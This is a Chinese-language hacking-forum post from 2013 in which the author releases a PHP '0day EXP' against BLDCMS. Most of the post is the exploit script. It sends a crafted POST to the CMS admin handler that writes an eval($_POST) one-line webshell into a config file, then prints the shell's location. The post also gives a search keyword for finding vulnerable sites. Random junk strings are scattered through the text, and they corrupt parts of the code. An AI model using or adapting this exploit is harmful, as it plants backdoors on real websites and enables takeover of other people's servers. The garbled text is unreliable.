之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
/ h8 k1 {1 R5 q2 T" y
) q" ^8 k# k7 @! R0 ~ e 9 k( a2 k8 g6 C7 t/ P" H
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 : y# q% y8 j5 A p: E& t
8 h8 q9 L3 w! C' l' G ?
既然都有人发了 我就把我之前写好的EXP放出来吧) j# b5 X, ?- z( ~0 g2 B
" B3 \9 {% B9 c% h
view source print?01.php;">
0 d1 J g- s8 ]02.<!--?php
4 l' R* S, K" f# ^# C, }0 p03.echo "-------------------------------------------------------------------
. R7 d% e5 A& J# p8 B' Q3 I, S/ \2 \& T04. 6 o x4 m" U/ h6 j1 W# ~9 `5 g
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP8 F8 N+ p, F! k, { I, x
06. 1 h' G r4 N4 s L( Q) @. i( A% e
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun3 _( S5 U5 |. ?
08. * @/ O* I5 e( t/ C: k
09.QQ:981009941\r\n 2013.3.21\r\n
4 b% ]5 I/ ~/ [5 L% P10.
4 Z9 ]" f. c8 x11. $ a7 I$ g/ t4 q) B+ z* e( U
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码5 ?4 A3 |; @ ~9 M0 u
13.
% C" y; p b* H% |# k& k6 o6 K# c14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
! C8 i2 a, [' x! `7 C15. . r" n, ]. R0 d0 _: ?; i
16.--------------------------------------------------------------------\r\n";; \$ C% E0 t9 G5 D5 b1 N2 u& F
17.$url=$argv[1];
' o; i# Q h Q% P18.$dir=$argv[2];4 u) O0 D9 Z# H' K7 |2 H! `7 j3 V
19.$pass=$argv[3];
* p {" P' S8 F8 E0 C" v20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';+ U/ d2 h9 ]( c3 p; g- N; [
21.if (emptyempty($pass)||emptyempty($url))2 k- @" K" [# O# r5 q8 K1 l3 E
22.{exit("请输入参数");}5 Y/ C, H0 q" ?, v" U H
23.else
1 e% L2 y. e, C. N% _24.{
, O4 D% N7 J: p9 a25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev8 E; Z8 `. R% k# {6 y3 X
26. 5 N- h+ g; _* C. T+ z
27.al;
- ~1 Q; V# B, h; i8 K28.$length = strlen($fuckdata);8 X7 C- _6 \) i' E7 ^" y9 J$ m
29.function getshell($url,$pass)7 E6 {/ S H ?5 {% A" L
30.{
* a( U$ E& P8 V) R, f \6 M31.global $url,$dir,$pass,$eval,$length,$fuckdata;4 {/ k$ x+ e G0 O
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
4 ]0 r3 j6 s1 r4 G* j33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
: ?1 j& p/ O- i4 f+ @+ C34.$header .= "User-Agent: MSIE\r\n";
& P+ c) C2 I, ^6 i35.$header .= "Host:".$url."\r\n";' ~1 y! `7 s, ^8 ~6 O% P4 E5 t' M
36.$header .= "Content-Length: ".$length."\r\n";
3 r( @( c% q( {+ v& ]; @5 x7 j37.$header .= "Connection: Close\r\n";
; n8 j; n6 q3 `, L38.$header .="\r\n";
# c4 S; f; s) B) @8 \39.$header .= $fuckdata."\r\n\r\n";" X8 u2 @& U5 t2 J: L
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
# J% h# `- V7 Z: T% B" q41.if (!$fp)- X5 O) T. c4 u9 w V) a1 h# F
42.{
: @( G: k! ?8 E43.exit ("利用失败:请检查指定目标是否能正常打开");1 k# q2 o* r/ |( @
44.}4 _- {8 w7 {6 N* d" w$ K
45.else{ if (!fputs($fp,$header))+ g) _0 j& r/ R8 u, v1 s( N8 e
46.{exit ("利用失败");}
, Q& }" u- J( u J! H! G% j47.else
& ?, y- C6 Y p7 \* v: T48.{
, |9 E1 @5 F8 R1 C/ R49.$receive = '';
Y! k1 l- r& l& ~50.while (!feof($fp)) {$ Q" _" q \+ v
51.$receive .= @fgets($fp, 1000);" ?/ d. |9 a) h
52.}$ l, r3 |, y. e+ v
53.@fclose($fp);
4 H* h; U& e3 e7 J" i+ n! ?54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标6 k5 s! z$ u" |" S; a6 F
55. . m7 X; q/ a) `0 d9 n
56.GPC是否=off)";
+ t' k2 q$ ~5 Q# @57.}}
( R- h* p' l. G58.}
5 v9 U) o& r6 b& ?0 [- z: |- x59.}7 Q* ^7 ^6 v2 `* H4 [0 x* d" {
60.getshell($url,$pass); e6 s' v! g9 T' T, _7 H
61.?-->
* ]% `1 B: y# }8 o# c. s 8 k% S0 X( Q; y4 O+ s$ b
, u6 G* z9 F2 {- U6 l' [0 i3 m3 K6 r
) N% C) s( _: O4 R4 M6 W+ mby 数据流- Y: y( D+ R0 `; T1 S( e) |3 }
|
发表于 2013-3-26 20:49:10
收藏
支持
反对